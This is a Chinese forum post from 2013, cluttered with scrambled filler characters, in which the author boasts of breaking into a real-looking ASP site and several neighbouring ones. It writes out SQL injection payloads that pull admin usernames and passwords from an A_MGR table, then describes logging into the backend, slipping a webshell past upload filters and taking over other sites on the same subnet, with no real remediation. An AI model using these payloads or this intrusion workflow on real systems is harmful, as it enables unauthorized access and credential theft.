发现一个注入点
/ t' E( G( j* O [+ G- T7 P8 yhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
6 g0 a9 j1 t1 Q; D) [+ J: x* _
/ X5 W+ c. w1 b' k4 V& z$ i习惯性的加’having1=1--
* t0 [$ E7 W$ `, h3 B( t' S( r; n9 Y! k6 w/ A; v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
. ^3 J8 V4 v5 ?5 o6 Z7 T* P; L" t, L% H/ Q1 l# j2 Q9 c) m C
0
; z! m6 M2 K! n$ q0 @3 U
' }6 o. |1 @* x9 r7 h爆出Diary_A.dl_Title(这时候很激动啊)" k/ G. ? S$ a$ @: ~
* x% r* ~/ q8 |% E6 P7 k' M8 u' ^
那么继续- }* P# f: l' \- l1 t- x
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
: Y2 m+ t$ Z+ D
" k0 S; _" S1 w5 ]# ^) U! ?& K继续,一直爆下去4 ]& G+ J0 \1 v4 P; b+ ~
* R, V" P' m1 W. e8 n3 L! {" S C
爆到几个字段和表段 但是没找到需要的管理用户的字段
7 s: g) g: V w1 ?, f3 X8 C' ~! X3 e- q! {3 t
蛋疼了 怎么办 然后去后台登陆页看源码
. n, O( R5 N9 L5 z( M5 ~9 {
3 S! q3 c Q$ B# v$ m; ?; Z3 _. [4 A0
$ E. A" T% w* G7 U3 j, I/ e; D9 Z- E$ c- @3 i
Input name= “ADUID”
9 X, ]7 c P- b/ I, T2 [( n+ QInput name= “ADPWD”
* m2 ^3 s8 t# @
/ n4 ]8 J% d; @ h/ \很幸运 找到了字段那就继续
& [4 N0 Q5 a7 o h) H( G找到之后开始爆用户3 g) h$ M) }, v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
j% [2 B7 A: @3 f爆密码
3 v, Y, y& f2 k3 L4 A& Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
' h1 n/ a# \7 t5 N测试了下 这个注入点只能爆到文章哪里的表
: s# `3 u6 L4 l2 k( u2 s
0 a4 d2 j. G4 x; p头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了( t% V- K' k4 n7 }. k- t3 ?
0 p! U Y4 T& i又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* L, c8 J8 s0 \) e6 t1 A4 N5 P* g+ i0 o& i3 r& r8 S: t
473
B$ M6 L$ L6 o* E, f: N
1 F9 y, p( R7 W4 H0 Y7 a6 v进后台+ x3 f6 e0 ~( _+ G5 y" u: ~" E7 R5 l
7 r" ?; [5 t8 q7 u8 y
3 I$ k2 X' W# X* k2 Q9 f* p4 T发现几个上传点 有的地方不能上传 而且防止恶意代码* T& ]" ]- v/ [1 v9 ?+ {0 L% J
+ Q C/ N; {0 W+ [ `8 l7 R: `* D没办法 各种百度各种找大牛 找到一只好像可以突破的马
: L! n" ~3 Q0 | s5 I/ J+ @8 A9 S% b; N. e0 D0 ^
8 D! y9 G+ ~. i在系统管理那里直接上传 不过没有显示地址
0 l) n8 ]! B u2 d' J6 U8 G! g' t4 X' D) R% ^, T) z& W
再上传一次 抓包 搞定OK% z( z: c/ r$ g$ O5 d+ k) B
# T. @1 f) K9 b( h7 s
6 G* ?0 C4 ~+ r! X! ~0 w7 E- b
l0 \$ i* S3 F0 K+ N472
6 s5 A1 P1 M3 C" u. Q' Q0 p# V' v3 t4 n1 z, D. \
晚上不行了 去睡觉。。。
4 ]7 p1 I. Z6 j7 H1 k第二天刚起床 闲的没事做继续日站吧 + o7 r2 `( p8 ]( R! M* Y
/ Q( O/ S, _1 F3 R0 p: Z找个站 就把这个站的旁c扫了下$ r! B+ e" }1 u V
$ f9 m. {6 B u# ]+ p& A) k
发现c段也有一个购物站 ,然后还和这个站的模板差不多
4 R# Y% ]/ M* F4 a9 j( Z4 m7 T
% M7 ?5 U% U! A: T% O' k就找到会员登录口测试
; `# F9 }5 G. A4 h( O
$ a( w8 C' p" Y) g$ D'and (select top 1 MGR_UID from A_MGR)>0—
( F) H% M8 V! B3 T$ V果断爆到了 这时候我很激动 通杀
0 w% {, e2 N/ v) }% d; i6 _/ a5 O0 i2 ^2 O$ @3 M n" [
再次翻c段0 V& ]/ D2 n5 P% p; w
4 ~. c3 t* ^2 E$ Z4 O* `) I' I
翻出几个站 都成功拿下 @0 {& a& _4 O+ K
" @* _+ U, o% ?2 g7 O( U1 D
; M4 z; ~; [1 k8 P; M; ]; P( L2 [& s. ]% _
修复方案:0 {+ Y d' ^6 v( A3 g& t4 x
他们比我专业 % ]1 B1 n/ j3 g" h& R1 P
4 a( z$ K# b: ^4 j; P# ?
% t: |& W$ Z! h' z/ ~/ y* B- j) v- k2 Y* c$ S$ l2 N! z/ e
|
发表于 2013-4-4 17:40:38
收藏
支持
反对